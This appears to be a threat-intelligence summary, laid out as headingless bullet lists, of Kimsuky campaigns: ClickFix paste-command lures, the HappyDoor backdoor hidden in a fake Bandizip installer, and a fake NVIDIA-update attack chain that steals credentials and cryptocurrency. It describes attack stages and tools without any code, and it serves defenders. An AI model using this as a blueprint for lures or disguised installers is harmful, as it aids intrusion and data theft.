·         BabyShark: Kimsuky’s main malware series, including various script-based execution

·         QuasarRAT: Used as the final payload in the ClickFix campaign (Proofpoint)

·         Malicious .vbs script: Includes C2 connection, information collection, and scheduler registration features

·         .lnk File (Disguised as Edge Icon): Shortcut file prompting user to click

·         AutoIt Script (HncUpdateTray.exe): Executable file for stealing user information

·         ClickFix: Prompts users to execute manual commands through psychological manipulation

·         Email spoofing and social engineering (Spear-phishing)

·         Avoiding false detection through multilingual PDF manuals

·         Obfuscating PowerShell code by reversing it

·         C2 communication after executing .vbs and .lnk files

·         Maintaining persistence via scheduled task registration

·         Keylogging and information gathering

·         Stealing user information

·         Continual C2 connection to infected systems

·         Collecting keylogging records

·         Successfully evaded security and detection

·         Kimsuky employed the ClickFix technique, which is a tactic that prompts users to enter PowerShell commands directly.

·         In January 2025, they distributed a .vbs script via a disguised interview email.

·         In March, they sent a manual that included Code.txt to a U.S. national security advisor impersonating email.

·         The ClickFix technique is designed to trick users into thinking that they are troubleshooting, leading them to manually execute malicious commands.

·         Disguised in various forms, such as a fake portal login page and a job search site in the defense industry

·         After infection, the threat actor’s scheduled tasks are registered, C2 communication is established, and information is collected automatically

·         Related infrastructure (IP, domain) is distributed across multiple countries including Korea, China, and Vietnam

·         In some cases, cloud-based file delivery services such as Proton Drive and Google Drive are used

·         South Korea

·         Specifically includes government, media, education and research institutions, and think tanks

·         Distribution of a malicious .exe executable file disguised as the Bandizip installer

·         Installing the actual Bandizip program and executing a malicious DLL and remote script

·         Remote code execution through mshta and regsvr32

·         HappyDoor: A VMP-protected backdoor with features for collecting system information and exfiltrating 6 types of information

·         ut_happy (x64).dll: Implementation DLL for HappyDoor, performing multiple commands using regsvr32

·         Uso1Config.conf: A script file used to store attack commands based on PowerShell

·         mshta: Loading and executing remote HTML scripts

·         regsvr32: Registering and executing malicious DLLs

·         bat script: Self-deleting files and cleaning up the local environment

·         VBScript: Collecting system information and directory files and sending them to the C2

·         Disguised as a malicious installer (social engineering)

·         Loading and executing scripts step by step

·         Collecting information using PowerShell and VBScript

·         Using VMP virtualization to protect the backdoor and hinder analysis

·         Concealing using Registry and ADS

·         Executing a multi-stage DLL through regsvr32 parameter combinations

·         Transmitting commands and data via C2 communication

·         Ensuring persistence by creating a scheduled task

·         Stealing user information (account, system, IP, installed anti-malware, etc.)

·         Collecting key documents (.hwp, .doc, .pdf, etc.) in directories

·         Keylogging, taking screenshots, recording audio, exploring external devices, and collecting files

·         Backdoor for continuous remote control

·         The threat actor distributed the actual installation program and malicious DLL simultaneously through a disguised .exe file that posed as the Bandizip installer

·         When the .exe file is executed, the DLL is installed, initialized, and run in three stages using regsvr32

·         The script collects user information and then transmits it to a specific C2 URL

·         HappyDoor is packed with VMProtect, making it difficult to detect and analyze, and it includes various information collection features.

·         Links to disguised recruitment assessment and fake camera access requests, and users are asked to copy commands

·         Prompting the execution of update commands by spoofing the NVIDIA domain

·         VBS Script: Downloads malicious archive and executes Python environment

·         Python Script: Heavily obfuscated and includes credential theft, remote access, and data exfiltration features

·         WebBrowserPassView: Browser credential theft tool

·         MailPassView: Email credential theft tool

·         MeshAgent: Installs agent for remote control and persistence

·         PyInstaller EXE: Persistence via FTP-based file and secret exfiltration, Scheduled Task disguised as ChromeUpdate.exe

·         Browser extension and local cryptocurrency folder: Collects and exfiltrates cryptocurrency-related information

·         Phishing based on psychological social engineering: Trust-based baiting in job interviews

·         Domain spoofing (NVIDIA): Copying and modifying commands to execute malicious code

·         Obfuscated Python script

·         Stealing browser/email credentials, Installing remote agent, Scheduled task persistence, Collecting and exfiltrating cryptocurrency information

·         Stealing browser and email credentials → Exfiltration to C2 Server

·         Remote control and ensuring persistence (MeshAgent, scheduled task)

·         Collecting and transmitting cryptocurrency-related information → Possibility of stealing user’s sensitive data and assets

·         Details of the breach such as the specific scale of data exfiltration and system paralysis are not mentioned

·         Tricks users by pretending to be a recruitment evaluation screen and prompts them to copy and execute commands

·         Multi-stage attack including credential theft, remote access, scheduled task persistence, and cryptocurrency information theft by executing Windows-based VBS and then Python

·         An advanced attack chain that involves sophisticated impersonation and object inducement, similar to Lazarus’s “DeceptiveDevelopment”